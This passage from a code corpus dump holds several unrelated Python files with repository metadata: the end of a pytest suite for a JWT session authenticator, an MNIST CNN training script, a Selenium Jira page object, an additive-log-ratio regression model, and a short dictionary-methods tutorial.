'REMOTE_ADDR': '185.87.34.23',
'HTTP_USER_AGENT':
'Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; '
'Trident/5.0) MicrohttpClient-custom/4.5.6 (A; B; C)'
},
'expected_remote_address': '185.87.34.23',
'expected_machine': 'PC',
'expected_os': 'Windows 7',
'expected_agent': 'IE 9.0',
'expected_client': 'MicrohttpClient-custom 4.5.6',
'expected_app': 'A (B) C',
'expected_last_activity': '2017-07-13T13:11:44',
},
{
'environment': {
'REMOTE_ADDR': '172.16.0.111',
'HTTP_USER_AGENT': ''
},
'expected_remote_address': '172.16.0.111',
'expected_machine': 'Other',
'expected_os': 'Other',
'expected_agent': 'Other',
'expected_client': 'Unknown',
'expected_app': 'Unknown',
'expected_last_activity': '2017-07-13T13:11:44',
},
{
'environment': {},
'expected_remote_address': 'NA',
'expected_machine': 'Other',
'expected_os': 'Other',
'expected_agent': 'Other',
'expected_client': 'Unknown',
'expected_app': 'Unknown',
'expected_last_activity': '2017-07-13T13:11:44',
}
]
class RootController(Controller):
@json
@authorize
def motto(self):
return dict(
secret='Draco Dormiens Nunquam Titillandus'
)
@json
@authorize('operator')
def another_motto(self):
return dict(
secret='Titillandus Nunquam Dormiens Draco'
)
@json
@authorize
def get_payload(self):
return context.identity.to_dict()
@json
def get_session_info(self, session_id: str=None):
authenticator = StatefulAuthenticator()
return authenticator.get_session_info(
session_id or context.identity.session_id
) or dict()
@json
@authorize
def terminate_all_sessions(self):
authenticator = StatefulAuthenticator()
authenticator.invalidate_member(context.identity.id)
return dict()
@json
@authorize
def terminate_a_session(self):
authenticator = StatefulAuthenticator()
sessions = list(authenticator.get_member_sessions(context.identity.id))
for session_id in sessions:
if session_id != context.identity.session_id:
authenticator.unregister_session(session_id)
return dict()
@json
@authorize
def get_sessions(self):
authenticator = StatefulAuthenticator()
return list(authenticator.get_member_sessions(context.identity.id))
@json
def login(self, role_name: str='supervisor'):
session_id = str(uuid4()).replace('-', '')
authenticator = StatefulAuthenticator()
access_token = authenticator.__class__.create_token(dict(
id=context.form.get('mobile'),
mobile=context.form.get('mobile'),
roles=[role_name],
sessionId=session_id
))
authenticator.register_session(
member_id=context.form.get('mobile'),
session_id=session_id
)
return dict(
accessToken=access_token
)
class MyApplication(Application):
def __init__(self):
super().__init__(
root=RootController()
)
self.__authenticator__ = StatefulAuthenticator()
def configure(self, *args, **kwargs):
super().configure(*args, **kwargs)
settings.merge("""
auth:
jwt_algorithm: HS256
jwt_secret_key: DSXdzzxxOiIxMjM0NTY3ODkwIiwFtZSI6IkpvadG4gRG9lrr
redis:
host: localhost
port: 6379
""")
def begin_request(self):
self.__authenticator__.authenticate_request()
def prepare(self):
pass
@pytest.fixture(scope='module')
def app():
my_app = MyApplication()
my_app.configure(force=True)
my_app.prepare()
return WebtestApp(my_app, lint=False)
@pytest.fixture(scope='module')
def sample_access_token(app):
resp = app.post('/login/supervisor', params={
'mobile': '935935935'
}).json
return resp['accessToken']
def test_authenticate(app):
# Create access token
resp = app.post('/login/supervisor', params={
'mobile': '935935935'
}).json
access_token1 = resp['accessToken']
# Access granted
app.get('/motto', headers={
'Authorization': access_token1
})
# Access denied
app.get('/motto', status=401)
    # Log in with another role and verify role-based access
resp = app.post('/login/operator', params={
'mobile': '935935936'
}).json
access_token2 = resp['accessToken']
app.get('/motto', headers={
'Authorization': access_token2
})
app.get('/another_motto', headers={
'Authorization': access_token2
})
app.get('/another_motto', headers={
'Authorization': access_token1
}, status=403)
app.get('/another_motto', status=401)
# Empty session info
resp = app.get('/get_session_info/xyz').json
assert len(resp.keys()) == 0
@pytest.mark.parametrize('test_case', session_info_test_cases)
def test_sessions_info(app, sample_access_token, test_case):
with freeze_time("2017-07-13T13:11:44", tz_offset=-4):
payload = app.get(
'/get_payload',
headers={
'Authorization': sample_access_token
},
extra_environ=test_case['environment']
).json
info = app.get('/get_session_info/%s' % payload['sessionId']).json
expected_info = {
'remoteAddress': test_case['expected_remote_address'],
'machine': test_case['expected_machine'],
'os': test_case['expected_os'],
'agent': test_case['expected_agent'],
'client': test_case['expected_client'],
'app': test_case['expected_app'],
'lastActivity': test_case['expected_last_activity']
}
for info_key, info_val in info.items():
assert info_val == expected_info[info_key]
def test_manage_sessions(app):
app.post('/login/operator', params={
'mobile': '935935936'
})
resp = app.post('/login/operator', params={
'mobile': '935935936'
}).json
access_token = resp['accessToken']
# Get sessions
sessions = app.get('/get_sessions', headers={
'Authorization': access_token
}).json
assert len(sessions) > 0
# Terminate one session
app.delete('/terminate_a_session', headers={
'Authorization': access_token
})
# Terminate all sessions
app.delete('/terminate_all_sessions', headers={
'Authorization': access_token
})
# Access denied
app.get('/get_sessions', headers={
'Authorization': access_token
}, status=401)
def test_authenticator(app):
_ = app
from nanohttp.contexts import Context
with Context({}):
authenticator = StatefulAuthenticator()
member_id = 500
for session_id in ('bla_bla1', 'bla_bla2', 'bla_bla3'):
authenticator.register_session(
member_id=member_id,
session_id=session_id
)
# Get session info
info = authenticator.get_session_info(
session_id=session_id
)
assert 'remoteAddress' in info
last_sessions = sessions = authenticator.get_member_sessions(member_id)
        assert len(sessions) > 0
authenticator.unregister_session(session_id)
sessions = authenticator.get_member_sessions(member_id)
assert len(sessions) == len(last_sessions) - 1
authenticator.invalidate_member(member_id)
sessions = authenticator.get_member_sessions(member_id)
assert len(sessions) == 0
| UTF-8 | Python | false | false | 8,987 | py | 10 | test_stateful_authenticator.py | 6 | 0.579615 | 0.551352 | 0 | 315 | 27.530159 | 79 |
ustcllh/MLUtility | 2,791,728,771,848 | 6b218a42d899ffec775c591103e2df49ee9046e9 | c90e7363b9b76615e2d60834fa272d6dd505cc53 | /digit_recognition_conv.py | 6c836559c7fadbc53d9e6c03f8e0ffeab3b99bef | []
| no_license | https://github.com/ustcllh/MLUtility | 7ee2e3d19945ed46a1d4d0bbee7396170c0e13fd | 0f252799fd3545aebd3a793117dc6381c6a4bd68 | refs/heads/master | 2021-08-19T23:04:58.176333 | 2021-06-11T17:18:40 | 2021-06-11T17:18:40 | 185,864,825 | 0 | 1 | null | null | null | null | null | null | null | null | null | null | null | null | null | import torch
import torch.nn as nn
import torchvision
from torchvision import transforms
import torch.nn.functional as F
# Neural Network with CNN + pooling layers
# note: dropout layers are disabled, please check nn.Dropout2d() for information
class Net(nn.Module):
def __init__(self):
super(Net, self).__init__()
self.conv1 = nn.Conv2d(1, 10, kernel_size=5)
self.maxpool1 = nn.MaxPool2d(kernel_size=2)
self.conv2 = nn.Conv2d(10, 20, kernel_size=5)
self.maxpool2 = nn.MaxPool2d(kernel_size=2)
#self.conv2_drop = nn.Dropout2d()
self.fc1 = nn.Linear(320, 50)
self.fc2 = nn.Linear(50, 10)
self.relu = nn.ReLU()
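    # Shape walk-through for a batch of N 1x28x28 MNIST images:
    #   conv1: (N,1,28,28) -> (N,10,24,24); maxpool1 -> (N,10,12,12)
    #   conv2: -> (N,20,8,8);  maxpool2 -> (N,20,4,4); flatten -> (N,320)
    # which is where the 320 in fc1 comes from. Note the final ReLU clamps
    # the logits at zero, while CrossEntropyLoss is usually fed raw logits.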
def forward(self, x):
x = self.relu(self.maxpool1(self.conv1(x)))
#x = self.relu(self.maxpool2(self.conv2_drop(self.conv2(x))))
x = self.relu(self.maxpool2(self.conv2(x)))
x = x.view(-1, 320)
x = self.relu(self.fc1(x))
#x = self.conv2_drop(x)
x = self.fc2(x)
return self.relu(x)
def main():
# check cpu/gpu usage
device = torch.device('cuda:0' if torch.cuda.is_available() else 'cpu')
print('Using device:', device)
#torch.backends.cudnn.enabled
# training dataset + dataloader
train_dataset = torchvision.datasets.MNIST(root='./data', train=True, transform=transforms.ToTensor(), download=True)
train_loader = torch.utils.data.DataLoader(dataset=train_dataset, num_workers=4, batch_size=1000, shuffle=True)
# validation dataset + dataloader
    valid_dataset = torchvision.datasets.MNIST(root='./data', train=False, transform=transforms.ToTensor(), download=True)
valid_loader = torch.utils.data.DataLoader(dataset=valid_dataset, num_workers=4, batch_size=1000, shuffle=False)
    # hyper parameters (input_size/hidden_size/output_size are leftovers
    # from an earlier fully-connected variant and are unused by the CNN)
    input_size = 784
    hidden_size = 500
    output_size = 10
num_epochs = 5
learning_rate = 0.001
# initiate a neural network
model = Net()
model = model.to(device)
print(model)
# loss function
lossFunction = nn.CrossEntropyLoss()
# learnable parameters optimizer
optimizer = torch.optim.Adam(model.parameters(), lr=learning_rate)
total_step = len(train_loader)
# loop over epochs
for epoch in range(num_epochs):
# loop over training dataset
for i, (images,labels) in enumerate(train_loader):
# move data from main memory to device (cpu/gpu) associated memory
images = images.to(device)
labels = labels.to(device)
# output and loss
out = model(images)
loss = lossFunction(out,labels)
# adjust learnable parameters
optimizer.zero_grad()
loss.backward()
optimizer.step()
# calculate accuracy with validation dataset
        corr = 0.
        total = 0.
for j, (valid_images, valid_labels) in enumerate(valid_loader):
valid_images = valid_images.to(device)
valid_labels = valid_labels.to(device)
out = model(valid_images)
corr += (out.argmax(dim=1)==valid_labels).sum().item()
total += len(valid_labels)
accuracy = 100.00 * corr / total
print('Epoch [{}/{}], Accuracy[Corr/Total]: [{}/{}] = {:.2f} %' .format(epoch+1, num_epochs, corr, total, accuracy))
# saving model
model_path = './digit_recognizer_cnn.pt'
torch.save(model.state_dict(), model_path)
# initiate a new neural network
model_valid = Net()
# load a well-trained network
    # map_location=device keeps the load working on CPU-only machines too
    model_valid.load_state_dict(torch.load(model_path, map_location=device))
model_valid.to(device)
# use the well-trained network and calculate accuracy
corr=0
total=0
for j, (valid_images, valid_labels) in enumerate(valid_loader):
valid_images = valid_images.to(device)
valid_labels = valid_labels.to(device)
out = model_valid(valid_images)
corr += (out.argmax(dim=1)==valid_labels).sum().item()
total += len(valid_labels)
accuracy = 100.00 * corr / total
print('Validation Accuracy[Corr/Total]: [{}/{}] = {:.2f} %' .format(corr, total, accuracy))
if __name__ == '__main__':
main()
| UTF-8 | Python | false | false | 4,224 | py | 4 | digit_recognition_conv.py | 3 | 0.621686 | 0.600142 | 0 | 127 | 32.244094 | 124 |
sergiievdokimov/AQA-Python-Odessa | 781,684,089,426 | 4c1cc0bd1702a2e3baeb2b91c6b09012bbdf2057 | 87669859027f45fde819b8c1cd25e26aad414e99 | /src/pages/create_issue_page.py | 1bdc89ef7b82ee3498d816ac42b1f2a692e75773 | []
| no_license | https://github.com/sergiievdokimov/AQA-Python-Odessa | 9d2148a7f3317ece514348b21ebbdc2c62d160a3 | d945faa411c1fcfe67223b407ea708a02819bcf5 | refs/heads/master | 2022-12-15T04:16:41.466798 | 2019-06-03T08:53:52 | 2019-06-03T08:53:52 | 179,825,140 | 0 | 0 | null | false | 2022-12-08T01:43:51 | 2019-04-06T11:31:53 | 2019-06-03T08:53:54 | 2022-12-08T01:43:50 | 27 | 0 | 0 | 5 | Python | false | false | from selenium.webdriver.common.by import By
from selenium.webdriver.common.keys import Keys
from selenium.webdriver.support import expected_conditions
from selenium.webdriver.support.wait import WebDriverWait
from src.pages.base_page import BasePage
class CreateIssuePage(BasePage):
PROJECT_FIELD = (By.ID, "project-field")
ISSUE_TYPE = (By.ID, "issuetype-field")
SUMMARY = (By.ID, "summary")
DESCRIPTION = (By.CSS_SELECTOR, ".mce-container")
PRIORITY = (By.ID, "priority-field")
LABELS = (By.ID, "labels-textarea")
ASSIGNEE = (By.ID, "assignee-field")
EPIC = (By.ID, "customfield_10000-field")
CREATE_ISSUE_SUBMIT_BUTTON_ID = (By.ID, "create-issue-submit")
CANCEL_BUTTON_ID = (By.CSS_SELECTOR, "a.cancel")
SUBMISSION_ERROR = (By.CSS_SELECTOR, ".error")
ISSUE_SUCCESSFULLY_CREATED_MESSAGE = (By.ID, "aui-flag-container")
def __init__(self, driver):
self.driver = driver
def set_project(self, project_name):
if project_name is not None:
self.driver.find_element(*self.PROJECT_FIELD).clear()
self.driver.find_element(*self.PROJECT_FIELD).send_keys(project_name)
self.driver.find_element(*self.PROJECT_FIELD).send_keys(Keys.ENTER)
WebDriverWait(self.driver, 10).until(expected_conditions.element_to_be_clickable(self.CREATE_ISSUE_SUBMIT_BUTTON_ID))
def set_issue_type(self, type_name):
if type_name is not None:
self.driver.find_element(*self.ISSUE_TYPE).clear()
self.driver.find_element(*self.ISSUE_TYPE).send_keys(type_name)
self.driver.find_element(*self.ISSUE_TYPE).send_keys(Keys.ENTER)
WebDriverWait(self.driver, 10).until(expected_conditions.element_to_be_clickable(self.CREATE_ISSUE_SUBMIT_BUTTON_ID))
def set_summary(self, summary):
if summary is not None:
self.driver.find_element(*self.SUMMARY).send_keys(summary)
def set_description(self, description):
if description is not None:
self.driver.find_element(*self.DESCRIPTION).click()
self.driver.find_element(*self.DESCRIPTION).send_keys(description)
def set_priority(self, priority_name):
if priority_name is not None:
WebDriverWait(self.driver, 10).until(expected_conditions.element_to_be_clickable(self.CREATE_ISSUE_SUBMIT_BUTTON_ID))
self.driver.find_element(*self.PRIORITY).location_once_scrolled_into_view
self.driver.find_element(*self.PRIORITY).clear()
self.driver.find_element(*self.PRIORITY).send_keys(priority_name)
self.driver.find_element(*self.PRIORITY).send_keys(Keys.ENTER)
def set_assignee(self, assignee):
if assignee is not None:
self.driver.find_element(*self.ASSIGNEE).location_once_scrolled_into_view
self.driver.find_element(*self.ASSIGNEE).clear()
self.driver.find_element(*self.ASSIGNEE).send_keys(assignee)
self.driver.find_element(*self.ASSIGNEE).send_keys(Keys.ENTER)
def click_submit_button(self):
self.driver.find_element(*self.CREATE_ISSUE_SUBMIT_BUTTON_ID).click()
def click_cancel_button(self):
self.driver.find_element(*self.CANCEL_BUTTON_ID).click()
def at_page(self):
        return self.is_element_visible(self.CREATE_ISSUE_SUBMIT_BUTTON_ID) and ("Create Issue - Hillel IT School JIRA" in self.driver.title)
def is_successful_message_displayed(self):
return self.is_element_visible(self.ISSUE_SUCCESSFULLY_CREATED_MESSAGE)
def is_submission_error_displayed(self):
return self.is_element_visible(self.SUBMISSION_ERROR)
def create_issue(self, project_name, issue_type, summary, description, priority, assignee):
self.set_project(project_name)
self.set_issue_type(issue_type)
self.set_summary(summary)
self.set_description(description)
self.set_priority(priority)
self.set_assignee(assignee)
self.click_submit_button()
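    # Usage sketch (illustrative values; assumes the Create Issue dialog is open):
    #   page = CreateIssuePage(driver)
    #   page.create_issue('HILLEL', 'Bug', 'Login fails', 'steps...', 'High', 'qa.user')
    #   assert page.is_successful_message_displayed()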
def accept_alert(self):
self.driver.switch_to.alert.accept()
| UTF-8 | Python | false | false | 4,083 | py | 28 | create_issue_page.py | 24 | 0.683076 | 0.680382 | 0 | 89 | 44.876404 | 138 |
Ebedthan/clv | 6,047,313,963,548 | 6e294948529c0bbce966f4cbdfb153eda2c31f43 | ba3e6545257173f1e73f7d3ccb315862e951a4d2 | /linear_alr.py | 5ba938e3abc9033811f702b837f6eed53e690a5f | [
"MIT"
]
| permissive | https://github.com/Ebedthan/clv | b5b4a82807cf93946e0c1d6d81baba089be87cba | c184cd5f98a8f471f9e6131c88e7c9cf7717cf47 | refs/heads/master | 2023-03-18T19:14:08.495785 | 2021-01-25T15:14:58 | 2021-01-25T15:14:58 | null | 0 | 0 | null | null | null | null | null | null | null | null | null | null | null | null | null | import numpy as np
import sys
from scipy.special import logsumexp
from scipy.stats import linregress
from scipy.integrate import RK45, solve_ivp
from timeout import *
def choose_denom(P):
"""Pick a denominator for additive log-ratio transformation.
"""
np.seterr(divide="ignore", invalid="ignore")
log_change = None
for p in P:
s = p.sum(axis=1,keepdims=True)
s[s==0] = 1
deltas = np.log( (p/s)[1:] ) - np.log( (p/s)[:-1] )
if log_change is None:
log_change = deltas
else:
log_change = np.vstack((log_change, deltas))
np.seterr(divide="warn", invalid="warn")
# pick taxon with smallest change in log proportion
min_idx = -1
min_var = np.inf
ntaxa = log_change.shape[1]
for i in range(ntaxa):
if not np.all(np.isfinite(log_change[:,i])):
continue
var = np.var(log_change[:,i])
if var < min_var:
min_idx = i
min_var = var
if min_idx == -1:
print("Error: no valid denominator found", file=sys.stderr)
exit(1)
return min_idx
def construct_alr(P, denom, pseudo_count=1e-3):
"""Compute the additive log ratio transformation with a given
choice of denominator. Assumes zeros have been replaced with
nonzero values.
"""
ALR = []
ntaxa = P[0].shape[1]
numer = np.array([i for i in range(ntaxa) if i != denom])
for p in P:
p = np.copy(p)
p = (p + pseudo_count) / (p + pseudo_count).sum(axis=1,keepdims=True)
alr = (np.log(p[:,numer]).T - np.log(p[:,denom])).T
ALR.append(alr)
return ALR
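# Worked example (illustrative numbers): with denom = 2 and a single row
# p = [0.2, 0.3, 0.5], construct_alr returns [log(0.2/0.5), log(0.3/0.5)]
# (up to the pseudo-count smoothing above).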
class LinearALR:
"""Inference for the linear model under the additive log-ratio transformation
"""
def __init__(self, P=None, T=None, U=None, denom=None, pseudo_count=1e-3):
"""
Parameters
----------
P : A list of T_x by D dimensional numpy arrays of
estimated relative abundances.
T : A list of T_x by 1 dimensional numpy arrays giving
the times of each observation x.
U : An optional list of T_x by P numpy arrays of external
perturbations for each x.
denom : integer id for taxa in denominator of log ratio
"""
self.P = P
self.T = T
if P is not None and denom is None:
self.denom = choose_denom(P)
self.X = construct_alr(P, self.denom, pseudo_count)
elif P is not None and denom is not None:
self.denom = denom
self.X = construct_alr(P, denom, pseudo_count)
else:
self.X = None
if U is None and self.X is not None:
self.U = [ np.zeros((x.shape[0], 1)) for x in self.X ]
self.no_effects = True
else:
self.U = U
self.no_effects = False
# Parameter estimates
self.A = None
self.g = None
self.B = None
self.Q_inv = np.eye(self.P[0].shape[1]-1) if P is not None else None
# Regularization parameters
self.alpha = None
self.r_A = None
self.r_g = None
self.r_B = None
def get_regularizers(self):
return self.alpha, self.r_A, self.r_g, self.r_B
def set_regularizers(self, alpha, r_A, r_g, r_B):
self.alpha = alpha
self.r_A = r_A
self.r_g = r_g
self.r_B = r_B
def train(self, verbose=False, folds=10):
"""Estimate regularization parameters and CLV model parameters.
"""
if self.alpha is None or self.r_A is None or self.r_g is None or self.r_B is None:
if verbose:
print("Estimating regularizers...")
self.alpha, self.r_A, self.r_g, self.r_B = estimate_elastic_net_regularizers_cv(self.X, self.P, self.U, self.T, self.denom, folds=folds, no_effects=self.no_effects, verbose=verbose)
if verbose:
print("Estimating model parameters...")
self.A, self.g, self.B = elastic_net_alr(self.X, self.U, self.T, self.Q_inv, self.alpha, self.r_A, self.r_g, self.r_B)
if verbose:
print()
def predict(self, p0, times, u = None):
"""Predict relative abundances from initial conditions.
Parameters
----------
p0 : the initial observation, a D-dim numpy array
times : a T by 1 numpy array of sample times
u : a T by P numpy array of external perturbations
Returns
-------
        y_pred : a T by D numpy array of predicted relative
                 abundances. Since we cannot predict initial
                 conditions, the first entry is left as zeros.
"""
if u is None:
u = np.zeros((times.shape[0], 1))
if p0.ndim == 1:
p0 = p0.reshape((1, p0.size))
X = construct_alr([p0], self.denom)
x = X[0]
return predict(x, p0, u, times, self.A, self.g, self.B, self.denom)
def get_params(self):
A = np.copy(self.A)
g = np.copy(self.g)
B = np.copy(self.B)
return A, g, B
def elastic_net_alr(X, U, T, Q_inv, alpha, r_A, r_g, r_B, tol=1e-3, verbose=False, max_iter=10000):
def gradient(AgB, x_stacked, pgu_stacked):
f = x_stacked - AgB.dot(pgu_stacked.T).T
grad = Q_inv.dot(f.T.dot(pgu_stacked))
        # l2 (ridge) part of the elastic-net penalty; column blocks follow
        # the layout used when AgB is assembled below: A = [:, :xDim],
        # g = [:, xDim], B = [:, xDim+1:]
        A = AgB[:,:xDim]
        g = AgB[:,xDim:(xDim+1)]
        B = AgB[:,(xDim+1):]
        grad[:,:xDim] += -2*alpha*(1-r_A)*A
        grad[:,xDim:(xDim+1)] += -2*alpha*(1-r_g)*g
        grad[:,(xDim+1):] += -2*alpha*(1-r_B)*B
return -grad
    def generalized_gradient(AgB, grad, step):
        # proximal (soft-thresholding) step for the l1 part of the penalty;
        # uses the same A/g/B column layout as gradient() above
        nxt_AgB = AgB - step*grad
        # threshold A
        A_prox = nxt_AgB[:,:xDim]
        A_prox[A_prox < -step*alpha*r_A] += step*alpha*r_A
        A_prox[A_prox > step*alpha*r_A] -= step*alpha*r_A
        A_prox[np.logical_and(A_prox >= -step*alpha*r_A, A_prox <= step*alpha*r_A)] = 0
        # threshold g
        g_prox = nxt_AgB[:,xDim:(xDim+1)]
        g_prox[g_prox < -step*alpha*r_g] += step*alpha*r_g
        g_prox[g_prox > step*alpha*r_g] -= step*alpha*r_g
        g_prox[np.logical_and(g_prox >= -step*alpha*r_g, g_prox <= step*alpha*r_g)] = 0
        # threshold B
        B_prox = nxt_AgB[:,(xDim+1):]
        B_prox[B_prox < -step*alpha*r_B] += step*alpha*r_B
        B_prox[B_prox > step*alpha*r_B] -= step*alpha*r_B
        B_prox[np.logical_and(B_prox >= -step*alpha*r_B, B_prox <= step*alpha*r_B)] = 0
        AgB_proximal = np.zeros(AgB.shape)
        AgB_proximal[:,:xDim] = A_prox
        AgB_proximal[:,xDim:(xDim+1)] = g_prox
        AgB_proximal[:,(xDim+1):] = B_prox
        return (AgB - AgB_proximal)/step
def objective(AgB, x_stacked, pgu_stacked):
f = x_stacked - AgB.dot(pgu_stacked.T).T
obj = -0.5*(f.dot(Q_inv)*f).sum()
return -obj
def stack_observations(X, U, T):
# number of observations by xDim
x_stacked = None
# number of observations by xDim + 1 + uDim
pgu_stacked = None
for x, u, times in zip(X, U, T):
for t in range(1, times.size):
dt = times[t] - times[t-1]
xt0 = x[t-1]
gt0 = np.ones(1)
ut0 = u[t-1]
pgu = np.concatenate((xt0, gt0, ut0))
if x_stacked is None:
x_stacked = x[t] - x[t-1]
pgu_stacked = dt*pgu
else:
x_stacked = np.vstack((x_stacked, x[t] - x[t-1]))
pgu_stacked = np.vstack((pgu_stacked, dt*pgu))
return x_stacked, pgu_stacked
xDim = X[0].shape[1]
yDim = xDim + 1
uDim = U[0].shape[1]
A,g,B = ridge_regression_alr(X, U, T, np.max((alpha*(1-r_A), 0.01)), np.max((alpha*(1-r_g), 0.01)), np.max((alpha*(1-r_B), 0.01)))
AgB = np.zeros(( xDim, xDim + 1 + uDim ))
AgB[:,:xDim] = A
AgB[:,xDim:(xDim+1)] = np.expand_dims(g,axis=1)
AgB[:,(xDim+1):] = B
x_stacked, pgu_stacked = stack_observations(X, U, T)
prv_obj = np.inf
obj = objective(AgB, x_stacked, pgu_stacked)
it = 0
while np.abs(obj - prv_obj) > tol:
np.set_printoptions(suppress=True)
prv_AgB = np.copy(AgB)
prv_obj = obj
# line search
step = 0.1
grad = gradient(prv_AgB, x_stacked, pgu_stacked)
gen_grad = generalized_gradient(prv_AgB, grad, step)
nxt_AgB = prv_AgB - step*gen_grad
obj = objective(nxt_AgB, x_stacked, pgu_stacked)
while obj > prv_obj - step*(grad*gen_grad).sum() + step*0.5*np.square(gen_grad).sum():
step /= 2
gen_grad = generalized_gradient(prv_AgB, grad, step)
nxt_AgB = prv_AgB - step*gen_grad
obj = objective(nxt_AgB, x_stacked, pgu_stacked)
        A = nxt_AgB[:,:xDim]
        g = nxt_AgB[:,xDim:(xDim+1)]
        B = nxt_AgB[:,(xDim+1):]
        AgB[:,:xDim] = A
        AgB[:,xDim:(xDim+1)] = g
        AgB[:,(xDim+1):] = B
obj = objective(AgB, x_stacked, pgu_stacked)
it += 1
if verbose:
print("\t", it, obj)
if it > max_iter:
print("Warning: maximum number of iterations ({}) reached".format(max_iter), file=sys.stderr)
break
A = AgB[:,:xDim]
g = AgB[:,xDim:(xDim+1)].flatten()
B = AgB[:,(xDim+1):]
return A, g, B
def ridge_regression_alr(X, U, T, r_A=0, r_g=0, r_B=0):
"""Computes estimates of A, g, and B using least squares.
Parameters
----------
X : a list of T x yDim-1 numpy arrays
U : a list of T x uDim numpy arrays
T : a list of T x 1 numpy arrays with the time of each observation
    Returns
    -------
        A : (xDim, xDim) numpy array of interaction estimates
        g : (xDim,) numpy array of growth-rate estimates
        B : (xDim, uDim) numpy array of perturbation-effect estimates
    """
xDim = X[0].shape[1]
yDim = xDim + 1
uDim = U[0].shape[1]
AgB_term1 = np.zeros(( xDim, xDim + 1 + uDim ))
AgB_term2 = np.zeros(( xDim + 1 + uDim, xDim + 1 + uDim))
for idx, (xi, ui) in enumerate(zip(X, U)):
for t in range(1, xi.shape[0]):
            xt = xi[t]
            xt0 = xi[t-1]
            gt0 = np.ones(1)
            ut0 = ui[t-1]
            pgu = np.concatenate((xt0, gt0, ut0))
delT = T[idx][t] - T[idx][t-1]
AgB_term1 += np.outer( (xt - xt0) / delT, pgu)
AgB_term2 += np.outer(pgu, pgu)
reg = np.array([r_A for i in range(xDim)] + [r_g] + [r_B for i in range(uDim)])
reg = np.diag(reg)
AgB = AgB_term1.dot(np.linalg.pinv(AgB_term2 + reg))
A = AgB[:,:xDim]
g = AgB[:,xDim:(xDim+1)].flatten()
B = AgB[:,(xDim+1):]
return A, g, B
def estimate_elastic_net_regularizers_cv(X, P, U, T, denom, folds, no_effects=False, verbose=False):
if len(X) == 1:
print("Error: cannot estimate regularization parameters from single sample", file=sys.stderr)
exit(1)
elif len(X) < folds:
folds = len(X)
rs = [0.1, 0.5, 0.7, 0.9, 1]
alphas = [0.1, 1, 10]
alpha_rA_rg_rB = []
for alpha in alphas:
for r_A in rs:
for r_g in rs:
if no_effects:
alpha_rA_rg_rB.append((alpha, r_A, r_g, 0))
else:
for r_B in rs:
alpha_rA_rg_rB.append((alpha, r_A, r_g, r_B))
np.set_printoptions(suppress=True)
best_r = 0
best_sqr_err = np.inf
for i, (alpha, r_A, r_g, r_B) in enumerate(alpha_rA_rg_rB):
#print("\tTesting regularization parameter set", i+1, "of", len(alpha_rA_rg_rB), file=sys.stderr)
sqr_err = 0
for fold in range(folds):
train_X = []
train_P = []
train_U = []
train_T = []
test_X = []
test_P = []
test_U = []
test_T = []
for i in range(len(X)):
if i % folds == fold:
test_X.append(X[i])
test_P.append(P[i])
test_U.append(U[i])
test_T.append(T[i])
else:
train_X.append(X[i])
train_P.append(P[i])
train_U.append(U[i])
train_T.append(T[i])
Q_inv = np.eye(train_X[0].shape[1])
A, g, B = elastic_net_alr(train_X, train_U, train_T, Q_inv, alpha, r_A, r_g, r_B, tol=1e-3)
sqr_err += compute_prediction_error(test_X, test_P, test_U, test_T, A, g, B, denom)
if sqr_err < best_sqr_err:
best_r = (alpha, r_A, r_g, r_B)
best_sqr_err = sqr_err
print("\tr", (alpha, r_A, r_g, r_B), "sqr error", sqr_err)
np.set_printoptions(suppress=False)
return best_r
def compute_rel_abun(x, denom):
if x.ndim == 1:
x = np.expand_dims(x, axis=0)
z = np.hstack((x, np.zeros((x.shape[0], 1))))
p = np.exp(z - logsumexp(z, axis=1, keepdims=True))
for i in range(p.shape[1]-1, denom, -1):
tmp = np.copy(p[:,i-1])
p[:,i-1] = np.copy(p[:,i])
p[:,i] = tmp
return p
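# compute_rel_abun inverts construct_alr (up to the pseudo count): append a
# zero coordinate for the denominator, softmax back onto the simplex, then
# rotate the denominator column into its original position. Round-trip
# sketch (illustrative): for p on the simplex and d = choose_denom([p]),
# compute_rel_abun(construct_alr([p], d)[0], d) is approximately p.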
@timeout(5)
def predict(x, p, u, times, A, g, B, denom):
"""Make predictions from initial conditions
"""
def grad_fn(A, g, B, u):
def fn(t, x):
return g + A.dot(x) + B.dot(u)
return fn
p_pred = np.zeros((times.shape[0], x[0].size+1))
pt = p[0]
xt = x[0]
for i in range(1, times.shape[0]):
grad = grad_fn(A, g, B, u[i-1])
dt = times[i] - times[i-1]
ivp = solve_ivp(grad, (0,0+dt), xt, method="RK45")
xt = ivp.y[:,-1]
pt = compute_rel_abun(xt, denom).flatten()
p_pred[i] = pt
return p_pred
def compute_prediction_error(X, P, U, T, A, g, B, denom_ids):
def compute_err(p, p_pred):
err = 0
ntaxa = p.shape[1]
#err += np.mean(np.square(p[1:] - p_pred[1:]).sum(axis=1))
err += np.square(p[1:] - p_pred[1:]).sum()
return err/ntaxa
err = 0
for x, p, u, t in zip(X, P, U, T):
try:
p_pred = predict(x, p, u, t, A, g, B, denom_ids)
err += compute_err(p, p_pred)
except TimeoutError:
err += np.inf
return err/len(X)
| UTF-8 | Python | false | false | 14,463 | py | 32 | linear_alr.py | 17 | 0.506534 | 0.492083 | 0 | 456 | 30.717105 | 193 |
ajayasocean/learnSdet | 11,287,174,085,306 | 8e8e190ac02cefd4c6f11aa638d8bc98d18de0d9 | 56d6987ffcc49ccd1446cfbcfc63e3e1294fca41 | /pythonBasicsOld/dictMethods.py | 109171ea131d843c03316ca3a5b1735b655bf2b1 | []
| no_license | https://github.com/ajayasocean/learnSdet | 6b6139459d6488c40f665f4b3e75fbba408deba8 | b22c1a9356730ba31d3b782393d4487c5e32fcd9 | refs/heads/master | 2023-06-14T08:33:08.569432 | 2021-07-09T20:11:15 | 2021-07-09T20:11:15 | 376,581,573 | 0 | 0 | null | null | null | null | null | null | null | null | null | null | null | null | null | # dictionary methods
# copy() method
avng1 ={'iron-man':'Tony', 'Cap':'Steve','BW':'Natasha'}
avng2 = avng1.copy()
print('copy of avng1 is',avng2)
# Understanding copy vs assignment
a1 = {'iron-man':"Tony", "CA":"Steve","BW":"Natasha"}
a2 = a1
print(a2)
cw = a1.copy()
print(cw)
print('id of a1',id(a1))
print('id of a2',id(a2))
print('id of cw',id(cw))
print(a1)
a1['hulk']='Bruce-Banner'
print(a1)
print(a2)
print(cw)
##print(cw['hulk'])  # would raise KeyError: cw was copied before 'hulk' was added
# get() method
print('get having a default message',a1.get('iron-man',"not found"))
print(a1.get('panther',"not found"))
print('get having no default message', a1.get('black'))
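# Note: get() only reads; setdefault() below also INSERTS the key with the
# default value when it is missing, which is why a1 keeps growing.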
